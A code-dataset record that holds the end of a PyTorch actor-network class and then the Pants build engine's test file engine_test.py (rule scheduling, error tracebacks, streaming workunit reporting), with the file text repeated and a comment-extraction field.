self.tmp_layers.append(nn.Linear(layers[i], action_size))
self.layers = nn.Sequential(*self.tmp_layers)
self.droput = nn.Dropout(self.drop_rate)
def forward(self, state):
"""Build a network that maps state -> action values."""
x = torch.sigmoid(self.layers(state))
return x
def _add_activation_function(self, use_l_relu, layers):
if use_l_relu:
self.tmp_layers.append(nn.LeakyReLU())
else:
self.tmp_layers.append(nn.ReLU())
def print_parameters(self, episode):
with open(str(f'model_weights_{episode}.txt'), 'a') as fp:
for name, param in self.named_parameters():
print(f'Name: {name}\tParam: {param}', file=fp)
print('{}'.format('='*40), file=fp)
|
en
| 0.582958
|
Actor (Policy) Model. Initialize parameters and build model. Params ====== state_size (int): Dimension of each state action_size (int): Dimension of each action seed (int): Random seed Build a network that maps state -> action values.
| 2.910425
| 3
|
src/python/pants/engine/internals/engine_test.py
|
wiwa/pants
| 0
|
6628075
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import itertools
import time
import unittest
from dataclasses import dataclass, field
from textwrap import dedent
from typing import List
from pants.engine.fs import EMPTY_DIGEST
from pants.engine.internals.scheduler import ExecutionError
from pants.engine.internals.scheduler_test_base import SchedulerTestBase
from pants.engine.process import Process, ProcessResult
from pants.engine.rules import RootRule, rule
from pants.engine.selectors import Get, MultiGet
from pants.reporting.streaming_workunit_handler import StreamingWorkunitHandler
from pants.testutil.engine.util import (
assert_equal_with_printing,
fmt_rule,
remove_locations_from_traceback,
)
from pants.testutil.test_base import TestBase
from pants.util.logging import LogLevel
class A:
pass
class B:
pass
class C:
pass
class D:
pass
def fn_raises(x):
raise Exception(f"An exception for {type(x).__name__}")
@rule
def nested_raise(x: B) -> A: # type: ignore[return]
fn_raises(x)
@dataclass(frozen=True)
class Fib:
val: int
@rule(desc="Fibonacci", level=LogLevel.INFO)
async def fib(n: int) -> Fib:
if n < 2:
return Fib(n)
x, y = tuple(await MultiGet([Get[Fib](int(n - 2)), Get[Fib](int(n - 1))]))
return Fib(x.val + y.val)
@dataclass(frozen=True)
class MyInt:
val: int
@dataclass(frozen=True)
class MyFloat:
val: float
@rule
def upcast(n: MyInt) -> MyFloat:
return MyFloat(float(n.val))
# This set of dummy types and the following `@rule`s are intended to test that workunits are
# being generated correctly and with the correct parent-child relationships.
class Input:
pass
class Alpha:
pass
class Beta:
pass
class Gamma:
pass
class Omega:
pass
class Epsilon:
pass
@rule(canonical_name="rule_one", desc="Rule number 1", level=LogLevel.INFO)
async def rule_one_function(i: Input) -> Beta:
"""This rule should be the first one executed by the engine, and thus have no parent."""
a = Alpha()
o = await Get[Omega](Alpha, a)
b = await Get[Beta](Omega, o)
time.sleep(1)
return b
@rule(desc="Rule number 2", level=LogLevel.INFO)
async def rule_two(a: Alpha) -> Omega:
"""This rule should be invoked in the body of `rule_one` and therefore its workunit should be a
child of `rule_one`'s workunit."""
await Get[Gamma](Alpha, a)
return Omega()
@rule(desc="Rule number 3", level=LogLevel.INFO)
async def rule_three(o: Omega) -> Beta:
"""This rule should be invoked in the body of `rule_one` and therefore its workunit should be a
child of `rule_one`'s workunit."""
return Beta()
@rule(desc="Rule number 4", level=LogLevel.INFO)
def rule_four(a: Alpha) -> Gamma:
"""This rule should be invoked in the body of `rule_two` and therefore its workunit should be a
child of `rule_two`'s workunit."""
return Gamma()
@rule(desc="Rule A", level=LogLevel.INFO)
async def rule_A(i: Input) -> Alpha:
o = Omega()
a = await Get[Alpha](Omega, o)
return a
@rule
async def rule_B(o: Omega) -> Alpha:
e = Epsilon()
a = await Get[Alpha](Epsilon, e)
return a
@rule(desc="Rule C", level=LogLevel.INFO)
def rule_C(e: Epsilon) -> Alpha:
return Alpha()
class EngineTest(unittest.TestCase, SchedulerTestBase):
assert_equal_with_printing = assert_equal_with_printing
def scheduler(self, rules, include_trace_on_error):
return self.mk_scheduler(rules=rules, include_trace_on_error=include_trace_on_error)
def test_recursive_multi_get(self):
# Tests that a rule that "uses itself" multiple times per invoke works.
rules = [
fib,
RootRule(int),
]
(fib_10,) = self.mk_scheduler(rules=rules).product_request(Fib, subjects=[10])
self.assertEqual(55, fib_10.val)
def test_no_include_trace_error_raises_boring_error(self):
rules = [
RootRule(B),
nested_raise,
]
scheduler = self.scheduler(rules, include_trace_on_error=False)
with self.assertRaises(ExecutionError) as cm:
list(scheduler.product_request(A, subjects=[(B())]))
self.assert_equal_with_printing(
"1 Exception encountered:\n\n Exception: An exception for B\n", str(cm.exception)
)
def test_no_include_trace_error_multiple_paths_raises_executionerror(self):
rules = [
RootRule(B),
nested_raise,
]
scheduler = self.scheduler(rules, include_trace_on_error=False)
with self.assertRaises(ExecutionError) as cm:
list(scheduler.product_request(A, subjects=[B(), B()]))
self.assert_equal_with_printing(
dedent(
"""
2 Exceptions encountered:
Exception: An exception for B
Exception: An exception for B
"""
).lstrip(),
str(cm.exception),
)
def test_include_trace_error_raises_error_with_trace(self):
rules = [
RootRule(B),
nested_raise,
]
scheduler = self.scheduler(rules, include_trace_on_error=True)
with self.assertRaises(ExecutionError) as cm:
list(scheduler.product_request(A, subjects=[(B())]))
self.assert_equal_with_printing(
dedent(
"""
1 Exception encountered:
Traceback (most recent call last):
File LOCATION-INFO, in nested_raise
fn_raises(x)
File LOCATION-INFO, in fn_raises
raise Exception(f"An exception for {type(x).__name__}")
Exception: An exception for B
"""
).lstrip(),
remove_locations_from_traceback(str(cm.exception)),
)
@unittest.skip("flaky: https://github.com/pantsbuild/pants/issues/6829")
def test_trace_multi(self):
# Tests that when multiple distinct failures occur, they are each rendered.
@rule
def d_from_b_nested_raise(b: B) -> D: # type: ignore[return]
fn_raises(b)
@rule
def c_from_b_nested_raise(b: B) -> C: # type: ignore[return]
fn_raises(b)
@rule
def a_from_c_and_d(c: C, d: D) -> A:
return A()
rules = [
RootRule(B),
d_from_b_nested_raise,
c_from_b_nested_raise,
a_from_c_and_d,
]
scheduler = self.scheduler(rules, include_trace_on_error=True)
with self.assertRaises(ExecutionError) as cm:
list(scheduler.product_request(A, subjects=[(B())]))
self.assert_equal_with_printing(
dedent(
f"""
1 Exception encountered:
Computing Select(<{__name__}..B object at 0xEEEEEEEEE>, A)
Computing Task(a_from_c_and_d(), <{__name__}..B object at 0xEEEEEEEEE>, A, true)
Computing Task(d_from_b_nested_raise(), <{__name__}..B object at 0xEEEEEEEEE>, =D, true)
Throw(An exception for B)
Traceback (most recent call last):
File LOCATION-INFO, in call
val = func(*args)
File LOCATION-INFO, in d_from_b_nested_raise
fn_raises(b)
File LOCATION-INFO, in fn_raises
raise Exception('An exception for {{}}'.format(type(x).__name__))
Exception: An exception for B
Computing Select(<{__name__}..B object at 0xEEEEEEEEE>, A)
Computing Task(a_from_c_and_d(), <{__name__}..B object at 0xEEEEEEEEE>, A, true)
Computing Task(c_from_b_nested_raise(), <{__name__}..B object at 0xEEEEEEEEE>, =C, true)
Throw(An exception for B)
Traceback (most recent call last):
File LOCATION-INFO, in call
val = func(*args)
File LOCATION-INFO, in c_from_b_nested_raise
fn_raises(b)
File LOCATION-INFO, in fn_raises
raise Exception('An exception for {{}}'.format(type(x).__name__))
Exception: An exception for B
"""
).lstrip()
+ "\n",
remove_locations_from_traceback(str(cm.exception)),
)
def test_illegal_root_selection(self):
rules = [RootRule(B)]
scheduler = self.scheduler(rules, include_trace_on_error=False)
# No rules are available to compute A.
with self.assertRaises(Exception) as cm:
list(scheduler.product_request(A, subjects=[(B())]))
self.assert_equal_with_printing(
"No installed @rules return the type A. Is the @rule that you're expecting to run registered?",
str(cm.exception),
)
def test_nonexistent_root_fails_differently(self):
rules = [upcast]
with self.assertRaises(Exception) as cm:
list(self.mk_scheduler(rules=rules, include_trace_on_error=False))
self.assert_equal_with_printing(
dedent(
f"""
Rules with errors: 1
{fmt_rule(upcast)}:
No rule was available to compute MyInt. Maybe declare RootRule(MyInt)?
"""
).strip(),
str(cm.exception),
)
@dataclass
class WorkunitTracker:
"""This class records every non-empty batch of started and completed workunits received from the
engine."""
finished_workunit_chunks: List[List[dict]] = field(default_factory=list)
started_workunit_chunks: List[List[dict]] = field(default_factory=list)
finished: bool = False
def add(self, workunits, **kwargs) -> None:
if kwargs["finished"] is True:
self.finished = True
started_workunits = kwargs.get("started_workunits")
if started_workunits:
self.started_workunit_chunks.append(started_workunits)
if workunits:
self.finished_workunit_chunks.append(workunits)
class StreamingWorkunitTests(unittest.TestCase, SchedulerTestBase):
def test_streaming_workunits_reporting(self):
rules = [fib, RootRule(int)]
scheduler = self.mk_scheduler(
rules, include_trace_on_error=False, should_report_workunits=True
)
tracker = WorkunitTracker()
handler = StreamingWorkunitHandler(
scheduler, callbacks=[tracker.add], report_interval_seconds=0.01
)
with handler.session():
scheduler.product_request(Fib, subjects=[0])
flattened = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
# The execution of the single named @rule "fib" should be providing this one workunit.
self.assertEqual(len(flattened), 1)
tracker.finished_workunit_chunks = []
with handler.session():
scheduler.product_request(Fib, subjects=[10])
# Requesting a bigger fibonacci number will result in more rule executions and thus more reported workunits.
# In this case, we expect 10 invocations of the `fib` rule.
flattened = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
assert len(flattened) == 10
assert tracker.finished
def test_streaming_workunits_parent_id_and_rule_metadata(self):
rules = [RootRule(Input), rule_one_function, rule_two, rule_three, rule_four]
scheduler = self.mk_scheduler(
rules, include_trace_on_error=False, should_report_workunits=True
)
tracker = WorkunitTracker()
handler = StreamingWorkunitHandler(
scheduler, callbacks=[tracker.add], report_interval_seconds=0.01
)
with handler.session():
i = Input()
scheduler.product_request(Beta, subjects=[i])
assert tracker.finished
# rule_one should complete well-after the other rules because of the artificial delay in it caused by the sleep().
assert {item["name"] for item in tracker.finished_workunit_chunks[0]} == {
"rule_two",
"rule_three",
"rule_four",
}
# Because of the artificial delay in rule_one, it should have time to be reported as
# started but not yet finished.
started = list(itertools.chain.from_iterable(tracker.started_workunit_chunks))
assert len(list(item for item in started if item["name"] == "rule_one")) > 0
assert {item["name"] for item in tracker.finished_workunit_chunks[1]} == {"rule_one"}
finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
r1 = next(item for item in finished if item["name"] == "rule_one")
r2 = next(item for item in finished if item["name"] == "rule_two")
r3 = next(item for item in finished if item["name"] == "rule_three")
r4 = next(item for item in finished if item["name"] == "rule_four")
# rule_one should have no parent_id because its actual parent workunit was filted based on level
assert r1.get("parent_id", None) is None
assert r2["parent_id"] == r1["span_id"]
assert r3["parent_id"] == r1["span_id"]
assert r4["parent_id"] == r2["span_id"]
assert r3["description"] == "Rule number 3"
assert r4["description"] == "Rule number 4"
assert r4["level"] == "INFO"
def test_streaming_workunit_log_levels(self) -> None:
rules = [RootRule(Input), rule_one_function, rule_two, rule_three, rule_four]
scheduler = self.mk_scheduler(
rules, include_trace_on_error=False, should_report_workunits=True
)
tracker = WorkunitTracker()
handler = StreamingWorkunitHandler(
scheduler,
callbacks=[tracker.add],
report_interval_seconds=0.01,
max_workunit_verbosity=LogLevel.TRACE,
)
with handler.session():
i = Input()
scheduler.product_request(Beta, subjects=[i])
assert tracker.finished
finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
# With the max_workunit_verbosity set to TRACE, we should see the workunit corresponding to the Select node.
select = next(
item
for item in finished
if item["name"] not in {"rule_one", "rule_two", "rule_three", "rule_four"}
)
assert select["name"] == "select"
assert select["level"] == "DEBUG"
r1 = next(item for item in finished if item["name"] == "rule_one")
assert r1["parent_id"] == select["span_id"]
def test_streaming_workunit_log_level_parent_rewrite(self) -> None:
rules = [RootRule(Input), rule_A, rule_B, rule_C]
scheduler = self.mk_scheduler(
rules, include_trace_on_error=False, should_report_workunits=True
)
tracker = WorkunitTracker()
info_level_handler = StreamingWorkunitHandler(
scheduler,
callbacks=[tracker.add],
report_interval_seconds=0.01,
max_workunit_verbosity=LogLevel.INFO,
)
with info_level_handler.session():
i = Input()
scheduler.product_request(Alpha, subjects=[i])
assert tracker.finished
finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
assert len(finished) == 2
r_A = next(item for item in finished if item["name"] == "rule_A")
r_C = next(item for item in finished if item["name"] == "rule_C")
assert "parent_id" not in r_A
assert r_C["parent_id"] == r_A["span_id"]
scheduler = self.mk_scheduler(
rules, include_trace_on_error=False, should_report_workunits=True
)
tracker = WorkunitTracker()
debug_level_handler = StreamingWorkunitHandler(
scheduler,
callbacks=[tracker.add],
report_interval_seconds=0.01,
max_workunit_verbosity=LogLevel.DEBUG,
)
with debug_level_handler.session():
i = Input()
scheduler.product_request(Alpha, subjects=[i])
assert tracker.finished
finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
r_A = next(item for item in finished if item["name"] == "rule_A")
r_B = next(item for item in finished if item["name"] == "rule_B")
r_C = next(item for item in finished if item["name"] == "rule_C")
assert r_B["parent_id"] == r_A["span_id"]
assert r_C["parent_id"] == r_B["span_id"]
class StreamingWorkunitProcessTests(TestBase):
additional_options = ["--no-process-execution-use-local-cache"]
def test_process_digests_on_workunits(self):
self._init_engine() # need to call this so that self._scheduler is not None when we pass it to StreamingWorkunitHandler
tracker = WorkunitTracker()
handler = StreamingWorkunitHandler(
self._scheduler,
callbacks=[tracker.add],
report_interval_seconds=0.01,
max_workunit_verbosity=LogLevel.INFO,
)
stdout_process = Process(
argv=("/bin/bash", "-c", "/bin/echo 'stdout output'"), description="Stdout process"
)
with handler.session():
result = self.request_single_product(ProcessResult, stdout_process)
assert tracker.finished
finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
process_workunit = next(
item for item in finished if item["name"] == "multi_platform_process-running"
)
assert process_workunit is not None
stdout_digest = process_workunit["artifacts"]["stdout_digest"]
stderr_digest = process_workunit["artifacts"]["stderr_digest"]
assert result.stdout == b"stdout output\n"
assert stderr_digest == EMPTY_DIGEST
assert stdout_digest.serialized_bytes_length == len(result.stdout)
tracker = WorkunitTracker()
handler = StreamingWorkunitHandler(
self._scheduler,
callbacks=[tracker.add],
report_interval_seconds=0.01,
max_workunit_verbosity=LogLevel.INFO,
)
stderr_process = Process(
argv=("/bin/bash", "-c", "1>&2 /bin/echo 'stderr output'"), description="Stderr process"
)
with handler.session():
result = self.request_single_product(ProcessResult, stderr_process)
assert tracker.finished
finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
process_workunit = next(
item for item in finished if item["name"] == "multi_platform_process-running"
)
assert process_workunit is not None
stdout_digest = process_workunit["artifacts"]["stdout_digest"]
stderr_digest = process_workunit["artifacts"]["stderr_digest"]
assert result.stderr == b"stderr output\n"
assert stdout_digest == EMPTY_DIGEST
assert stderr_digest.serialized_bytes_length == len(result.stderr)
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import itertools
import time
import unittest
from dataclasses import dataclass, field
from textwrap import dedent
from typing import List
from pants.engine.fs import EMPTY_DIGEST
from pants.engine.internals.scheduler import ExecutionError
from pants.engine.internals.scheduler_test_base import SchedulerTestBase
from pants.engine.process import Process, ProcessResult
from pants.engine.rules import RootRule, rule
from pants.engine.selectors import Get, MultiGet
from pants.reporting.streaming_workunit_handler import StreamingWorkunitHandler
from pants.testutil.engine.util import (
assert_equal_with_printing,
fmt_rule,
remove_locations_from_traceback,
)
from pants.testutil.test_base import TestBase
from pants.util.logging import LogLevel
class A:
pass
class B:
pass
class C:
pass
class D:
pass
def fn_raises(x):
raise Exception(f"An exception for {type(x).__name__}")
@rule
def nested_raise(x: B) -> A: # type: ignore[return]
fn_raises(x)
@dataclass(frozen=True)
class Fib:
val: int
@rule(desc="Fibonacci", level=LogLevel.INFO)
async def fib(n: int) -> Fib:
if n < 2:
return Fib(n)
x, y = tuple(await MultiGet([Get[Fib](int(n - 2)), Get[Fib](int(n - 1))]))
return Fib(x.val + y.val)
@dataclass(frozen=True)
class MyInt:
val: int
@dataclass(frozen=True)
class MyFloat:
val: float
@rule
def upcast(n: MyInt) -> MyFloat:
return MyFloat(float(n.val))
# This set of dummy types and the following `@rule`s are intended to test that workunits are
# being generated correctly and with the correct parent-child relationships.
class Input:
pass
class Alpha:
pass
class Beta:
pass
class Gamma:
pass
class Omega:
pass
class Epsilon:
pass
@rule(canonical_name="rule_one", desc="Rule number 1", level=LogLevel.INFO)
async def rule_one_function(i: Input) -> Beta:
"""This rule should be the first one executed by the engine, and thus have no parent."""
a = Alpha()
o = await Get[Omega](Alpha, a)
b = await Get[Beta](Omega, o)
time.sleep(1)
return b
@rule(desc="Rule number 2", level=LogLevel.INFO)
async def rule_two(a: Alpha) -> Omega:
"""This rule should be invoked in the body of `rule_one` and therefore its workunit should be a
child of `rule_one`'s workunit."""
await Get[Gamma](Alpha, a)
return Omega()
@rule(desc="Rule number 3", level=LogLevel.INFO)
async def rule_three(o: Omega) -> Beta:
"""This rule should be invoked in the body of `rule_one` and therefore its workunit should be a
child of `rule_one`'s workunit."""
return Beta()
@rule(desc="Rule number 4", level=LogLevel.INFO)
def rule_four(a: Alpha) -> Gamma:
"""This rule should be invoked in the body of `rule_two` and therefore its workunit should be a
child of `rule_two`'s workunit."""
return Gamma()
@rule(desc="Rule A", level=LogLevel.INFO)
async def rule_A(i: Input) -> Alpha:
o = Omega()
a = await Get[Alpha](Omega, o)
return a
@rule
async def rule_B(o: Omega) -> Alpha:
e = Epsilon()
a = await Get[Alpha](Epsilon, e)
return a
@rule(desc="Rule C", level=LogLevel.INFO)
def rule_C(e: Epsilon) -> Alpha:
return Alpha()
class EngineTest(unittest.TestCase, SchedulerTestBase):
assert_equal_with_printing = assert_equal_with_printing
def scheduler(self, rules, include_trace_on_error):
return self.mk_scheduler(rules=rules, include_trace_on_error=include_trace_on_error)
def test_recursive_multi_get(self):
# Tests that a rule that "uses itself" multiple times per invoke works.
rules = [
fib,
RootRule(int),
]
(fib_10,) = self.mk_scheduler(rules=rules).product_request(Fib, subjects=[10])
self.assertEqual(55, fib_10.val)
def test_no_include_trace_error_raises_boring_error(self):
rules = [
RootRule(B),
nested_raise,
]
scheduler = self.scheduler(rules, include_trace_on_error=False)
with self.assertRaises(ExecutionError) as cm:
list(scheduler.product_request(A, subjects=[(B())]))
self.assert_equal_with_printing(
"1 Exception encountered:\n\n Exception: An exception for B\n", str(cm.exception)
)
def test_no_include_trace_error_multiple_paths_raises_executionerror(self):
rules = [
RootRule(B),
nested_raise,
]
scheduler = self.scheduler(rules, include_trace_on_error=False)
with self.assertRaises(ExecutionError) as cm:
list(scheduler.product_request(A, subjects=[B(), B()]))
self.assert_equal_with_printing(
dedent(
"""
2 Exceptions encountered:
Exception: An exception for B
Exception: An exception for B
"""
).lstrip(),
str(cm.exception),
)
def test_include_trace_error_raises_error_with_trace(self):
rules = [
RootRule(B),
nested_raise,
]
scheduler = self.scheduler(rules, include_trace_on_error=True)
with self.assertRaises(ExecutionError) as cm:
list(scheduler.product_request(A, subjects=[(B())]))
self.assert_equal_with_printing(
dedent(
"""
1 Exception encountered:
Traceback (most recent call last):
File LOCATION-INFO, in nested_raise
fn_raises(x)
File LOCATION-INFO, in fn_raises
raise Exception(f"An exception for {type(x).__name__}")
Exception: An exception for B
"""
).lstrip(),
remove_locations_from_traceback(str(cm.exception)),
)
@unittest.skip("flaky: https://github.com/pantsbuild/pants/issues/6829")
def test_trace_multi(self):
# Tests that when multiple distinct failures occur, they are each rendered.
@rule
def d_from_b_nested_raise(b: B) -> D: # type: ignore[return]
fn_raises(b)
@rule
def c_from_b_nested_raise(b: B) -> C: # type: ignore[return]
fn_raises(b)
@rule
def a_from_c_and_d(c: C, d: D) -> A:
return A()
rules = [
RootRule(B),
d_from_b_nested_raise,
c_from_b_nested_raise,
a_from_c_and_d,
]
scheduler = self.scheduler(rules, include_trace_on_error=True)
with self.assertRaises(ExecutionError) as cm:
list(scheduler.product_request(A, subjects=[(B())]))
self.assert_equal_with_printing(
dedent(
f"""
1 Exception encountered:
Computing Select(<{__name__}..B object at 0xEEEEEEEEE>, A)
Computing Task(a_from_c_and_d(), <{__name__}..B object at 0xEEEEEEEEE>, A, true)
Computing Task(d_from_b_nested_raise(), <{__name__}..B object at 0xEEEEEEEEE>, =D, true)
Throw(An exception for B)
Traceback (most recent call last):
File LOCATION-INFO, in call
val = func(*args)
File LOCATION-INFO, in d_from_b_nested_raise
fn_raises(b)
File LOCATION-INFO, in fn_raises
raise Exception('An exception for {{}}'.format(type(x).__name__))
Exception: An exception for B
Computing Select(<{__name__}..B object at 0xEEEEEEEEE>, A)
Computing Task(a_from_c_and_d(), <{__name__}..B object at 0xEEEEEEEEE>, A, true)
Computing Task(c_from_b_nested_raise(), <{__name__}..B object at 0xEEEEEEEEE>, =C, true)
Throw(An exception for B)
Traceback (most recent call last):
File LOCATION-INFO, in call
val = func(*args)
File LOCATION-INFO, in c_from_b_nested_raise
fn_raises(b)
File LOCATION-INFO, in fn_raises
raise Exception('An exception for {{}}'.format(type(x).__name__))
Exception: An exception for B
"""
).lstrip()
+ "\n",
remove_locations_from_traceback(str(cm.exception)),
)
def test_illegal_root_selection(self):
rules = [RootRule(B)]
scheduler = self.scheduler(rules, include_trace_on_error=False)
# No rules are available to compute A.
with self.assertRaises(Exception) as cm:
list(scheduler.product_request(A, subjects=[(B())]))
self.assert_equal_with_printing(
"No installed @rules return the type A. Is the @rule that you're expecting to run registered?",
str(cm.exception),
)
def test_nonexistent_root_fails_differently(self):
rules = [upcast]
with self.assertRaises(Exception) as cm:
list(self.mk_scheduler(rules=rules, include_trace_on_error=False))
self.assert_equal_with_printing(
dedent(
f"""
Rules with errors: 1
{fmt_rule(upcast)}:
No rule was available to compute MyInt. Maybe declare RootRule(MyInt)?
"""
).strip(),
str(cm.exception),
)
@dataclass
class WorkunitTracker:
"""This class records every non-empty batch of started and completed workunits received from the
engine."""
finished_workunit_chunks: List[List[dict]] = field(default_factory=list)
started_workunit_chunks: List[List[dict]] = field(default_factory=list)
finished: bool = False
def add(self, workunits, **kwargs) -> None:
if kwargs["finished"] is True:
self.finished = True
started_workunits = kwargs.get("started_workunits")
if started_workunits:
self.started_workunit_chunks.append(started_workunits)
if workunits:
self.finished_workunit_chunks.append(workunits)
class StreamingWorkunitTests(unittest.TestCase, SchedulerTestBase):
def test_streaming_workunits_reporting(self):
rules = [fib, RootRule(int)]
scheduler = self.mk_scheduler(
rules, include_trace_on_error=False, should_report_workunits=True
)
tracker = WorkunitTracker()
handler = StreamingWorkunitHandler(
scheduler, callbacks=[tracker.add], report_interval_seconds=0.01
)
with handler.session():
scheduler.product_request(Fib, subjects=[0])
flattened = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
# The execution of the single named @rule "fib" should be providing this one workunit.
self.assertEqual(len(flattened), 1)
tracker.finished_workunit_chunks = []
with handler.session():
scheduler.product_request(Fib, subjects=[10])
# Requesting a bigger fibonacci number will result in more rule executions and thus more reported workunits.
# In this case, we expect 10 invocations of the `fib` rule.
flattened = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
assert len(flattened) == 10
assert tracker.finished
def test_streaming_workunits_parent_id_and_rule_metadata(self):
rules = [RootRule(Input), rule_one_function, rule_two, rule_three, rule_four]
scheduler = self.mk_scheduler(
rules, include_trace_on_error=False, should_report_workunits=True
)
tracker = WorkunitTracker()
handler = StreamingWorkunitHandler(
scheduler, callbacks=[tracker.add], report_interval_seconds=0.01
)
with handler.session():
i = Input()
scheduler.product_request(Beta, subjects=[i])
assert tracker.finished
# rule_one should complete well-after the other rules because of the artificial delay in it caused by the sleep().
assert {item["name"] for item in tracker.finished_workunit_chunks[0]} == {
"rule_two",
"rule_three",
"rule_four",
}
# Because of the artificial delay in rule_one, it should have time to be reported as
# started but not yet finished.
started = list(itertools.chain.from_iterable(tracker.started_workunit_chunks))
assert len(list(item for item in started if item["name"] == "rule_one")) > 0
assert {item["name"] for item in tracker.finished_workunit_chunks[1]} == {"rule_one"}
finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
r1 = next(item for item in finished if item["name"] == "rule_one")
r2 = next(item for item in finished if item["name"] == "rule_two")
r3 = next(item for item in finished if item["name"] == "rule_three")
r4 = next(item for item in finished if item["name"] == "rule_four")
# rule_one should have no parent_id because its actual parent workunit was filted based on level
assert r1.get("parent_id", None) is None
assert r2["parent_id"] == r1["span_id"]
assert r3["parent_id"] == r1["span_id"]
assert r4["parent_id"] == r2["span_id"]
assert r3["description"] == "Rule number 3"
assert r4["description"] == "Rule number 4"
assert r4["level"] == "INFO"
def test_streaming_workunit_log_levels(self) -> None:
rules = [RootRule(Input), rule_one_function, rule_two, rule_three, rule_four]
scheduler = self.mk_scheduler(
rules, include_trace_on_error=False, should_report_workunits=True
)
tracker = WorkunitTracker()
handler = StreamingWorkunitHandler(
scheduler,
callbacks=[tracker.add],
report_interval_seconds=0.01,
max_workunit_verbosity=LogLevel.TRACE,
)
with handler.session():
i = Input()
scheduler.product_request(Beta, subjects=[i])
assert tracker.finished
finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
# With the max_workunit_verbosity set to TRACE, we should see the workunit corresponding to the Select node.
select = next(
item
for item in finished
if item["name"] not in {"rule_one", "rule_two", "rule_three", "rule_four"}
)
assert select["name"] == "select"
assert select["level"] == "DEBUG"
r1 = next(item for item in finished if item["name"] == "rule_one")
assert r1["parent_id"] == select["span_id"]
def test_streaming_workunit_log_level_parent_rewrite(self) -> None:
rules = [RootRule(Input), rule_A, rule_B, rule_C]
scheduler = self.mk_scheduler(
rules, include_trace_on_error=False, should_report_workunits=True
)
tracker = WorkunitTracker()
info_level_handler = StreamingWorkunitHandler(
scheduler,
callbacks=[tracker.add],
report_interval_seconds=0.01,
max_workunit_verbosity=LogLevel.INFO,
)
with info_level_handler.session():
i = Input()
scheduler.product_request(Alpha, subjects=[i])
assert tracker.finished
finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
assert len(finished) == 2
r_A = next(item for item in finished if item["name"] == "rule_A")
r_C = next(item for item in finished if item["name"] == "rule_C")
assert "parent_id" not in r_A
assert r_C["parent_id"] == r_A["span_id"]
scheduler = self.mk_scheduler(
rules, include_trace_on_error=False, should_report_workunits=True
)
tracker = WorkunitTracker()
debug_level_handler = StreamingWorkunitHandler(
scheduler,
callbacks=[tracker.add],
report_interval_seconds=0.01,
max_workunit_verbosity=LogLevel.DEBUG,
)
with debug_level_handler.session():
i = Input()
scheduler.product_request(Alpha, subjects=[i])
assert tracker.finished
finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
r_A = next(item for item in finished if item["name"] == "rule_A")
r_B = next(item for item in finished if item["name"] == "rule_B")
r_C = next(item for item in finished if item["name"] == "rule_C")
assert r_B["parent_id"] == r_A["span_id"]
assert r_C["parent_id"] == r_B["span_id"]
class StreamingWorkunitProcessTests(TestBase):
additional_options = ["--no-process-execution-use-local-cache"]
def test_process_digests_on_workunits(self):
self._init_engine() # need to call this so that self._scheduler is not None when we pass it to StreamingWorkunitHandler
tracker = WorkunitTracker()
handler = StreamingWorkunitHandler(
self._scheduler,
callbacks=[tracker.add],
report_interval_seconds=0.01,
max_workunit_verbosity=LogLevel.INFO,
)
stdout_process = Process(
argv=("/bin/bash", "-c", "/bin/echo 'stdout output'"), description="Stdout process"
)
with handler.session():
result = self.request_single_product(ProcessResult, stdout_process)
assert tracker.finished
finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
process_workunit = next(
item for item in finished if item["name"] == "multi_platform_process-running"
)
assert process_workunit is not None
stdout_digest = process_workunit["artifacts"]["stdout_digest"]
stderr_digest = process_workunit["artifacts"]["stderr_digest"]
assert result.stdout == b"stdout output\n"
assert stderr_digest == EMPTY_DIGEST
assert stdout_digest.serialized_bytes_length == len(result.stdout)
tracker = WorkunitTracker()
handler = StreamingWorkunitHandler(
self._scheduler,
callbacks=[tracker.add],
report_interval_seconds=0.01,
max_workunit_verbosity=LogLevel.INFO,
)
stderr_process = Process(
argv=("/bin/bash", "-c", "1>&2 /bin/echo 'stderr output'"), description="Stderr process"
)
with handler.session():
result = self.request_single_product(ProcessResult, stderr_process)
assert tracker.finished
finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
process_workunit = next(
item for item in finished if item["name"] == "multi_platform_process-running"
)
assert process_workunit is not None
stdout_digest = process_workunit["artifacts"]["stdout_digest"]
stderr_digest = process_workunit["artifacts"]["stderr_digest"]
assert result.stderr == b"stderr output\n"
assert stdout_digest == EMPTY_DIGEST
assert stderr_digest.serialized_bytes_length == len(result.stderr)
|
en
| 0.786018
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). # type: ignore[return] # This set of dummy types and the following `@rule`s are intended to test that workunits are # being generated correctly and with the correct parent-child relationships. This rule should be the first one executed by the engine, and thus have no parent. This rule should be invoked in the body of `rule_one` and therefore its workunit should be a child of `rule_one`'s workunit. This rule should be invoked in the body of `rule_one` and therefore its workunit should be a child of `rule_one`'s workunit. This rule should be invoked in the body of `rule_two` and therefore its workunit should be a child of `rule_two`'s workunit. # Tests that a rule that "uses itself" multiple times per invoke works. 2 Exceptions encountered: Exception: An exception for B Exception: An exception for B 1 Exception encountered: Traceback (most recent call last): File LOCATION-INFO, in nested_raise fn_raises(x) File LOCATION-INFO, in fn_raises raise Exception(f"An exception for {type(x).__name__}") Exception: An exception for B # Tests that when multiple distinct failures occur, they are each rendered. # type: ignore[return] # type: ignore[return] 1 Exception encountered: Computing Select(<{__name__}..B object at 0xEEEEEEEEE>, A) Computing Task(a_from_c_and_d(), <{__name__}..B object at 0xEEEEEEEEE>, A, true) Computing Task(d_from_b_nested_raise(), <{__name__}..B object at 